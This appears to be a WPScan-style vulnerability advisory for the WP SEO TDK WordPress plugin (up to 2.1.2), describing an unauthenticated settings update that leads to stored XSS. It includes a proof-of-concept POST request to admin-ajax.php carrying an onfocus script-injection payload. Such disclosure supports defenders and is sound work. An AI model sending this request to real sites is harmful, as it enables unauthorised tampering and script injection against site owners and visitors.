WordPress Plugin Vulnerabilities
WP SEO TDK <= 2.1.2 - Unauthenticated Setting Update to Stored XSS
Description
The plugin does not have authorisation when updating its settings, and relies on a CSRF check, which unfortunately can be bypassed. As a result, unauthenticated users could update the plugin's settings, which could also lead to Stored XSS issue as some are not escaped
Proof of Concept
POST /wp-admin/admin-ajax.php?page=seo HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 144 action=seo-update&seo_split=A%22%20autofocus%20onfocus%3dalert(%2fXSS%2f)%2f%2f&_wp_http_referer=https://example.com/wp-admin/admin-ajax.php
Affects Plugins
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-07-20 (about 2 years ago)
Added
2022-05-02 (about 2 years ago)
Last Updated
2022-05-02 (about 2 years ago)